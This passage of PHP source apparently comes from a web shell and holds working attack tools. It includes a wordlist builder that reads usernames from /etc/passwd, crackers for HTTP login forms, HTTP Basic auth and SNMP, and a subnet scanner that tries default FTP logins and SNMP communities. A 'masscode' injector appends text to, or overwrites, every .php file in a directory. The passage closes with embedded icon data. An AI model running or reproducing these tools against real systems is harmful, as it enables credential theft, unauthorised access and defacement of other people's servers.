  4277. if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n");
  4278. }
  4279. fclose($input);fclose($output);
  4280. echo "<font color=yellow>Done</font>";
  4281. }
  4282. }
  4283. }
  4284. else{
  4285. $output=fopen($_REQUEST['output'],'w');
  4286. if ($output){
  4287. while (!feof($input)){
  4288. $user = trim(fgets($input)," \n\r");
  4289. if (!strstr($user,":"))continue;
  4290. $user=substr($user,0,(strpos($user,':')));
  4291. if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n");
  4292. }
  4293. fclose($input);fclose($output);
  4294. echo "<font color=yellow>Done</font>";
  4295. }
  4296. else echo $errorbox." Unable to write data to ".htmlspecialchars($_REQUEST['input']) ."$et<br>";
  4297. }
  4298. }elseif (!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){
  4299. $res=downloadiT($_REQUEST['url'],$_REQUEST['output']);
  4300. if($combo && $res){
  4301. $file=file($_REQUEST['output']);
  4302. $output=fopen($_REQUEST['output'],'w');
  4303. foreach ($file as $v)fwrite($output,"$v:$v\n");
  4304. fclose($output);
  4305. }
  4306. echo "<font color=yellow>Done</font>";
  4307. }else{
  4308. $temp=whereistmP();
  4309. echo "<center>
  4310. <table>
  4311. <tr valign=top><td>
  4312. <table>Wordlist generator:<form method=\"POST\">
  4313. <tr>
  4314. <td width=\"20%\" bgcolor=\"#666666\">Range:</td>
  4315. <td bgcolor=\"#666666\">
  4316. <select name=range>
  4317. <option value=a>a-z</option>
  4318. <option value=Z>A-Z</option>
  4319. <option value=0>0-9</option></select>
  4320. </td></tr>
  4321. <tr>
  4322. <td width=\"20%\" bgcolor=\"#808080\">Min lenght:</td>
  4323. <td bgcolor=\"#808080\">
  4324. <select name=min>
  4325. <option value=1>1</option>
  4326. <option value=2>2</option>
  4327. <option value=3>3</option>
  4328. <option value=4>4</option>
  4329. <option value=5>5</option>
  4330. <option value=6>6</option>
  4331. <option value=7>7</option>
  4332. <option value=8>8</option>
  4333. <option value=9>9</option>
  4334. <option value=10>10</option>
  4335. </select>
  4336. </td></tr>
  4337. <tr><td width=\"20%\" bgcolor=\"#666666\">Max lenght:</td>
  4338. <td bgcolor=\"#666666\">
  4339. <select name=max><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select>
  4340. </td></tr>
  4341. <tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr>
  4342. <tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox name=combo style=\"border-width:1px;background-color:#666666;\" value=1 checked>Combo style output</td></tr>
  4343. <tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Make></td></tr></form></table>
  4344. </td><td>
  4345. <table>Grab dictionary:
  4346. <form method=\"POST\">
  4347. <tr><td width=\"20%\" bgcolor=\"#666666\">Grab from:</td>
  4348. <td bgcolor=\"#666666\"><input type=text value=\"/etc/passwd\" name=input size=35></td></tr>
  4349. <tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td>
  4350. <td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr>
  4351. <tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr>
  4352. <tr>
  4353. <td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Grab></td></tr></form>
  4354. </table>
  4355. </td><td>
  4356. <table>Download dictionary:<form method=\"POST\">
  4357. <tr><td width=\"20%\" bgcolor=\"#666666\">URL:</td><td bgcolor=\"#666666\"><input type=text value=\"http://vburton.ncsa.uiuc.edu/wordlist.txt\" name=url size=35></td></tr>
  4358. <tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr>
  4359. <tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr>
  4360. <tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Get></td></tr></form></table>
  4361. </td>
  4362. </tr></table>
  4363. </center> ";}
  4364. }
  4365. if ($act == "htmlform")
  4366. {
  4367. global $errorbox,$footer,$et,$hcwd;
  4368. if(!empty($_REQUEST['start'])){
  4369. $url=$_REQUEST['target'];
  4370. $uf=$_REQUEST['userf'];
  4371. $pf=$_REQUEST['passf'];
  4372. $sf=$_REQUEST['submitf'];
  4373. $sv=$_REQUEST['submitv'];
  4374. $method=$_REQUEST['method'];
  4375. $fail=$_REQUEST['fail'];
  4376. $dic=$_REQUEST['dictionary'];
  4377. $type=$_REQUEST['combo'];
  4378. $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
  4379. if(!file_exists($dic)) die("$errorbox Can not open dictionary.$et$footer");
  4380. $dictionary=fopen($dic,'r');
  4381. echo "<font color=blue>Cracking started...<br>";
  4382. while(!feof($dictionary)){
  4383. if($type){
  4384. $combo=trim(fgets($dictionary)," \n\r");
  4385. $user=substr($combo,0,strpos($combo,':'));
  4386. $pass=substr($combo,strpos($combo,':')+1);
  4387. }else{
  4388. $pass=trim(fgets($dictionary)," \n\r");
  4389. }
  4390. $url.="?$uf=$user&$pf=$pass&$sf=$sv";
  4391. $res=check_urL($url,$method,$fail,12);
  4392. if (!$res){echo "<font color=blue>U: $user P: $pass</font><br>";flusheR();if(!$type)break;}
  4393. flusheR();
  4394. }
  4395. fclose($dictionary);
  4396. echo "Done!</font><br>";
  4397. }
  4398. else echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"434\"><tr><td width=\"174\" bgcolor=\"#333333\">HTTP Form cracker:</td><td bgcolor=\"#333333\" width=\"253\"></td></tr><form method=\"POST\" name=form><tr><td width=\"174\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user>$hcwd</td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Action Page:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=target value=\"http://".getenv('HTTP_HOST')."/login.php\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Method:</td><td bgcolor=\"#666666\" width=\"253\"><select size=\"1\" name=\"method\"><option selected value=\"POST\">POST</option><option value=\"GET\">GET</option></select></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Username field name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=userf value=user size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Password field name:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=passf value=passwd size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Submit name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text value=login name=submitf size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Submit value:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text value=\"Login\" name=submitv size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Fail string:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=fail value=\"Try again\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right width=\"253\"><input class=buttons type=submit name=start value=Start></td></tr></form></table></center>";
  4399. }
  4400. if ($act == "basicauth")
  4401. {
  4402. global $errorbox,$et,$t,$crack,$hcwd;
  4403. if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
  4404. $data='';
  4405. $method=($_REQUEST['method'])?'POST':'GET';
  4406. if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));}
  4407. spliturL($_REQUEST['target'],$host,$page);
  4408. $type=$_REQUEST['combo'];
  4409. $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
  4410. if($method='GET')$page.=$data;
  4411. $dictionary=fopen($_REQUEST['dictionary'],'r');
  4412. echo "<font color=blue>";
  4413. while(!feof($dictionary)){
  4414. if($type){
  4415. $combo=trim(fgets($dictionary)," \n\r");
  4416. $user=substr($combo,0,strpos($combo,':'));
  4417. $pass=substr($combo,strpos($combo,':')+1);
  4418. }else{
  4419. $pass=trim(fgets($dictionary)," \n\r");
  4420. }
  4421. $so=fsockopen($host,80,$en,$es,5);
  4422. if(!$so){echo "$errorbox Can not connect to host$et";break;}
  4423. else{
  4424. $packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass");
  4425. if($method=='POST')$packet.="Content-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data);
  4426. $packet.="\r\n\r\n";
  4427. $packet.=$data;
  4428. fputs($so,$packet);
  4429. $res=substr(fgets($so),9,2);
  4430. fclose($so);
  4431. if($res=='20')echo "U: $user P: $pass</br>";
  4432. flusheR();
  4433. }
  4434. }
  4435. echo "Done!</font>";
  4436. }else echo "<center><form method=\"POST\" name=form><table><tr><td bgcolor=\"#333333\"><font color=silver>
  4437. HTTP Auth cracker:</font></td><td bgcolor=\"#333333\"><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>";
  4438. }
  4439. if ($act == "snmp")
  4440. {
  4441. global $t,$et,$errorbox,$crack,$hcwd;
  4442. if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
  4443. $target=$_REQUEST['target'];
  4444. $dictionary=fopen($_REQUEST['dictionary'],'r');
  4445. if ($dictionary){
  4446. echo "<font color=yellow>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
  4447. while(!feof($dictionary)){
  4448. $com=trim(fgets($dictionary)," \n\r");
  4449. $res=snmpchecK($target,$com,2);
  4450. if($res)echo "$com<br>";
  4451. flusheR();
  4452. }
  4453. echo "<br>Done</font>";
  4454. fclose($dictionary);
  4455. }
  4456. else{
  4457. echo "$errorbox Can not open dictionary.$et";
  4458. }
  4459. }
  4460. echo "<center><table width=\"50%\">SNMP cracker:<form method=\"POST\">$hcwd<tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>";
  4461. }
  4462. if ($act == "scanner")
  4463. {
  4464. global $hcwd;
  4465. if (!empty($_SERVER["SERVER_ADDR"])) $host=$_SERVER["SERVER_ADDR"];else $host ="127.0.0.1";
  4466. $udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1;
  4467. if (($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){
  4468. $target=$_REQUEST['target'];$from=(int) $_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu = 0;
  4469. echo "<font color=yellow>Port scanning started against ".htmlspecialchars($target).":<br>";
  4470. $start=time();
  4471. for($i=$from;$i<=$to;$i++){
  4472. if($tcp){
  4473. if (checkthisporT($target,$i,$timeout)){
  4474. $nu++;
  4475. $ser="";
  4476. if(getservbyport($i,"tcp"))$ser="(".getservbyport($i,"tcp").")";
  4477. echo "$nu) $i $ser (<a href=\"telnet://$target:$i\">Connect</a>) [TCP]<br>";
  4478. }
  4479. }
  4480. if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser="";if(getservbyport($i,"udp"))$ser="(".getservbyport($i,"udp").")";echo "$nu) $i $ser [UDP]<br>";}
  4481. flusheR();
  4482. }
  4483. $time=time()-$start;
  4484. echo "Done! ($time seconds)</font>";
  4485. }
  4486. elseif (!empty($_REQUEST['securityscanner'])){
  4487. echo "<font color=yellow>";
  4488. $start=time();
  4489. $from=$_REQUEST['from'];
  4490. $to=(int)$_REQUEST['to'];
  4491. $timeout=(int)$_REQUEST['timeout'];
  4492. $f = substr($from,strrpos($from,".")+1);
  4493. $from = substr($from,0,strrpos($from,"."));
  4494. if(!empty($_REQUEST['httpscanner'])){
  4495. echo "Loading webserver bug list...";
  4496. flusheR();
  4497. $buglist=whereistmP().DIRECTORY_SEPARATOR.namE();
  4498. $dl=@downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist);
  4499. if($dl){$file=file($buglist);echo "Done! scanning started.<br><br>";}else echo "Failed!!! scanning started without webserver security testing...<br><br>";
  4500. flusheR();
  4501. }else {$fr=htmlspecialchars($from); echo "Scanning $fr.$f-$fr.$to:<br><br>";}
  4502. for($i=$f;$i<=$to;$i++){
  4503. $output=0;
  4504. $ip="$from.$i";
  4505. if(!empty($_REQUEST['nslookup'])){
  4506. $hn=gethostbyaddr($ip);
  4507. if($hn!=$ip)echo "$ip [$hn]<br>";}
  4508. flusheR();
  4509. if(!empty($_REQUEST['ipscanner'])){
  4510. $port=$_REQUEST['port'];
  4511. if(strstr($port,","))$p=explode(",",$port);else $p[0]=$port;
  4512. $open=$ser="";
  4513. foreach($p as $po){
  4514. $scan=checkthisporT($ip,$po,$timeout);
  4515. if ($scan){
  4516. $ser="";
  4517. if($ser=getservbyport($po,"tcp"))$ser="($ser)";
  4518. $open.=" $po$ser ";
  4519. }
  4520. }
  4521. if($open){echo "$ip) Open ports:$open<br>";$output=1;}
  4522. flusheR();
  4523. }
  4524. if(!empty($_REQUEST['httpbanner'])){
  4525. $res=get_sw_namE($ip,$timeout);
  4526. if($res){
  4527. echo "$ip) Webserver software: ";
  4528. if($res==-1)echo "Unknow";
  4529. else echo $res;
  4530. echo "<br>";
  4531. $output=1;
  4532. }
  4533. flusheR();
  4534. }
  4535. if(!empty($_REQUEST['httpscanner'])){
  4536. if(checkthisporT($ip,80,$timeout) && !empty($file)){
  4537. $admin=array('/admin/','/adm/');
  4538. $users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www');
  4539. $nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/');
  4540. $cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/');
  4541. foreach ($file as $v){
  4542. $vuln=array();
  4543. $v=trim($v);
  4544. if(!$v || $v{0}=='#')continue;
  4545. $v=str_replace('","','^',$v);
  4546. $v=str_replace('"','',$v);
  4547. $vuln=explode('^',$v);
  4548. $page=$cqich=$nukech=$adminch=$userch=$vuln[1];
  4549. if(strstr($page,'@CGIDIRS'))
  4550. foreach($cgi as $cg){
  4551. $cqich=str_replace('@CGIDIRS',$cg,$page);
  4552. $url="http://$ip$cqich";
  4553. $res=check_urL($url,$vuln[3],$vuln[2],$timeout);
  4554. if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
  4555. flusheR();
  4556. }
  4557. elseif(strstr($page,'@ADMINDIRS'))
  4558. foreach ($admin as $cg){
  4559. $adminch=str_replace('@ADMINDIRS',$cg,$page);
  4560. $url="http://$ip$adminch";
  4561. $res=check_urL($url,$vuln[3],$vuln[2],$timeout);
  4562. if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
  4563. flusheR();
  4564. }
  4565. elseif(strstr($page,'@USERS'))
  4566. foreach ($users as $cg){
  4567. $userch=str_replace('@USERS',$cg,$page);
  4568. $url="http://$ip$userch";
  4569. $res=check_urL($url,$vuln[3],$vuln[2],$timeout);
  4570. if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
  4571. flusheR();
  4572. }
  4573. elseif(strstr($page,'@NUKE'))
  4574. foreach ($nuke as $cg){
  4575. $nukech=str_replace('@NUKE',$cg,$page);
  4576. $url="http://$ip$nukech";
  4577. $res=check_urL($url,$vuln[3],$vuln[2],$timeout);
  4578. if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
  4579. flusheR();
  4580. }
  4581. else{
  4582. $url="http://$ip$page";
  4583. $res=check_urL($url,$vuln[3],$vuln[2],$timeout);
  4584. if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
  4585. flusheR();
  4586. }
  4587. }
  4588. }
  4589. }
  4590. if(!empty($_REQUEST['smtprelay'])){
  4591. if(checkthisporT($ip,25,$timeout)){
  4592. $res='';
  4593. $res=checksmtP($ip,$timeout);
  4594. if($res==1){echo "$ip) SMTP relay found.<br>";$output=1;}flusheR();
  4595. }
  4596. }
  4597. if(!empty($_REQUEST['snmpscanner'])){
  4598. if(checkthisporT($ip,161,$timeout,1)){
  4599. $com=$_REQUEST['com'];
  4600. $coms=$res="";
  4601. if(strstr($com,","))$c=explode(",",$com);else $c[0]=$com;
  4602. foreach ($c as $v){
  4603. $ret=snmpchecK($ip,$v,$timeout);
  4604. if($ret)$coms .=" $v ";
  4605. }
  4606. if ($coms!=""){echo "$ip) SNMP FOUND: $coms<br>";$output=1;}
  4607. flusheR();
  4608. }
  4609. }
  4610. if(!empty($_REQUEST['ftpscanner'])){
  4611. if(checkthisporT($ip,21,$timeout)){
  4612. $usps=explode(',',$_REQUEST['userpass']);
  4613. foreach ($usps as $v){
  4614. $user=substr($v,0,strpos($v,':'));
  4615. $pass=substr($v,strpos($v,':')+1);
  4616. if($pass=='[BLANK]')$pass='';
  4617. $ftp=@ftp_connect($ip,21,$timeout);
  4618. if ($ftp){
  4619. if(@ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) <a href=\"ftp://$ip\" target=\"_blank\">$ip</a> System type: ".ftp_systype($ftp)."<br>";}
  4620. }
  4621. flusheR();
  4622. }
  4623. }
  4624. }
  4625. if($output)echo "<hr size=1 noshade>";
  4626. flusheR();
  4627. }
  4628. $time=time()-$start;
  4629. echo "Done! ($time seconds)</font>";
  4630. if(!empty($buglist))unlink($buglist);
  4631. }
  4632. else{
  4633. $chbox=(extension_loaded('sockets'))?"<input type=checkbox name=tcp value=1 checked>TCP<input type=checkbox name=udp value=1 checked>UDP":"<input type=hidden name=tcp value=1>";
  4634. echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td>Port scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">Target:</td><td bgcolor=\"#808080\" width=80%><input name=target value=$host size=40></td></tr><tr><td bgcolor=\"#666666\" width=25%>From:</td><td bgcolor=\"#666666\" width=25%><input name=fromport type=text value=\"1\" size=5></td></tr><tr><td bgcolor=\"#808080\" width=25%>To:</td><td bgcolor=\"#808080\" width=25%><input name=toport type=text value=\"1024\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Timeout:</td><td bgcolor=\"#666666\"><input name=timeout type=text value=\"2\" size=5></td><tr><td width=\"25%\" bgcolor=\"#808080\">$chbox</td><td bgcolor=\"#808080\" align=\"right\">$hcwd<input type=submit class=buttons name=portscanner value=Scan></td></tr></form></table>";
  4635. $host = substr($host,0,strrpos($host,"."));
  4636. echo "<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\" name=security><td>security scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\" width=80%><input name=from value=$host.1 size=40> <input type=checkbox value=1 style=\"border-width:1px;background-color:#808080;\" name=nslookup checked>NS lookup</td></tr><tr><td bgcolor=\"#666666\" width=25%>To:</td><td bgcolor=\"#666666\" width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>$hcwd</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Timeout:</td><td bgcolor=\"#808080\"><input name=timeout type=text value=\"2\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ipscanner value=1 checked onClick=\"document.security.port.disabled = !document.security.port.disabled;\" style=\"border-width:1px;background-color:#666666;\">Port scanner:</td><td bgcolor=\"#666666\"><input name=port type=text value=\"21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=httpbanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Get web banner</td><td bgcolor=\"#808080\"><input type=checkbox name=httpscanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Webserver security scanning&nbsp;&nbsp;&nbsp;<input type=checkbox name=smtprelay value=1 checked style=\"border-width:1px;background-color:#808080;\">SMTP relay check</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ftpscanner value=1 checked onClick=\"document.security.userpass.disabled = !document.security.userpass.disabled;\" style=\"border-width:1px;background-color:#666666;\">FTP password:</td><td bgcolor=\"#666666\"><input name=userpass type=text value=\"anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=snmpscanner value=1 onClick=\"document.security.com.disabled = !document.security.com.disabled;\" checked style=\"border-width:1px;background-color:#808080;\">SNMP:</td><td bgcolor=\"#808080\"><input name=com type=text value=\"public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,agent,manager,OrigEquipMfr,default,tivoli,openview,community,snmp,snmpd,Secret C0de,security,rmon,rmon_admin,hp_admin,NoGaH$@!,agent_steal,freekevin,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,apc,TENmanUFactOryPOWER,proxy,core,regional\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input type=submit class=buttons name=securityscanner value=Scan></td></tr></form></table></center><br><center>";
  4637. }
  4638. }
  4639. if ($act == "masscode")
  4640. {
  4641. if(isset($_POST['dir']) &&
  4642. $_POST['dir'] != '' &&
  4643. isset($_POST['filetype']) &&
  4644. $_POST['filetype'] != '' &&
  4645. isset($_POST['mode']) &&
  4646. $_POST['mode'] != '' &&
  4647. isset($_POST['message']) &&
  4648. $_POST['message'] != ''
  4649. )
  4650. {
  4651. $dir = $_POST['dir'];
  4652. $filetype = $_POST['filetype'];
  4653. $message = $_POST['message'];
  4654. $mode = "a"; //default mode
  4655. // Modes Begin
  4656. if($_POST['mode'] == 'Apender')
  4657. {
  4658. $mode = "a";
  4659. }
  4660. if($_POST['mode'] == 'Overwriter')
  4661. {
  4662. $mode = "w";
  4663. }
  4664. if($handle = opendir($dir))
  4665. {
  4666. ?>
  4667. Overwritten Files :-
  4668. <ul style="padding: 5px;" >
  4669. <?php
  4670. while(($file = readdir($handle)) !== False)
  4671. {
  4672. if((preg_match("/$filetype".'$'.'/', $file , $matches) != 0) && (preg_match('/'.$file.'$/', $self , $matches) != 1))
  4673. {
  4674. ?>
  4675. <li class="file"><a href="<?php echo "$self?open=$dir$file"?>"><?php echo $file; ?></a></li>
  4676. <?php
  4677. echo "\n";
  4678. $fd = fopen($dir.$file,$mode);
  4679. if (!$fd) echo "<p><font color=red>Permission Denied</font></p>"; break;
  4680. fwrite($fd,$message);
  4681. }
  4682. }
  4683. ?>
  4684. </ul>
  4685. <?php
  4686. }
  4687. }
  4688. else
  4689. {
  4690. ?>
  4691. <table >
  4692. <form method='POST'>
  4693. <input type="hidden" name="injector"/>
  4694. <tr>
  4695. <td class="title">
  4696. Directory
  4697. </td>
  4698. <td>
  4699. <input name="dir" value="<?php echo getcwd().$SEPARATOR; ?>" />
  4700. </td>
  4701. </tr>
  4702. <tr>
  4703. <td class="title">
  4704. Mode
  4705. </td>
  4706. <td>
  4707. <select style="width: 125px;" name="mode">
  4708. <option value="Apender">Apender</option>
  4709. <option value="Overwriter">Overwriter</option>
  4710. </select>
  4711. </td>
  4712. </tr>
  4713. <tr>
  4714. <td class="title">
  4715. File Type
  4716. </td>
  4717. <td>
  4718. <input type="text" class="cmd" name="filetype" value=".php" onblur="if(this.value=='')this.value='.php';" />
  4719. </td>
  4720. </tr>
  4721. <tr>
  4722. <td colspan="2">
  4723. <textarea name="message" cols="110" rows="10" class="cmd">I cant forget the time, i was trying to learn all this stuff without some guidance ..</textarea>
  4724. </td>
  4725. </tr>
  4726. <tr>
  4727. <td rowspan="2">
  4728. <input style="margin : 20px; margin-left: 315px; padding : 10px; width: 100px;" type="submit" value="Inject :D"/>
  4729. </td>
  4730. </tr>
  4731. </form>
  4732. </table>
  4733. <?php
  4734. }
  4735. }
  4736. }
  4737. else
  4738. {
  4739. @ob_clean();
  4740. $images = array(
  4741. "arrow_ltr"=>
  4742. "R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
  4743. "SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
  4744. "back"=>
  4745. "R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
  4746. "aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
  4747. "Wg0JADs=",
  4748. "buffer"=>
  4749. "R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
  4750. "eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
  4751. "Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
  4752. "change"=>
  4753. "R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
  4754. "/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
  4755. "AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
  4756. "wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
  4757. "CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
  4758. "zMshADs=",
  4759. "delete"=>
  4760. "R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
  4761. "6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
  4762. "sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
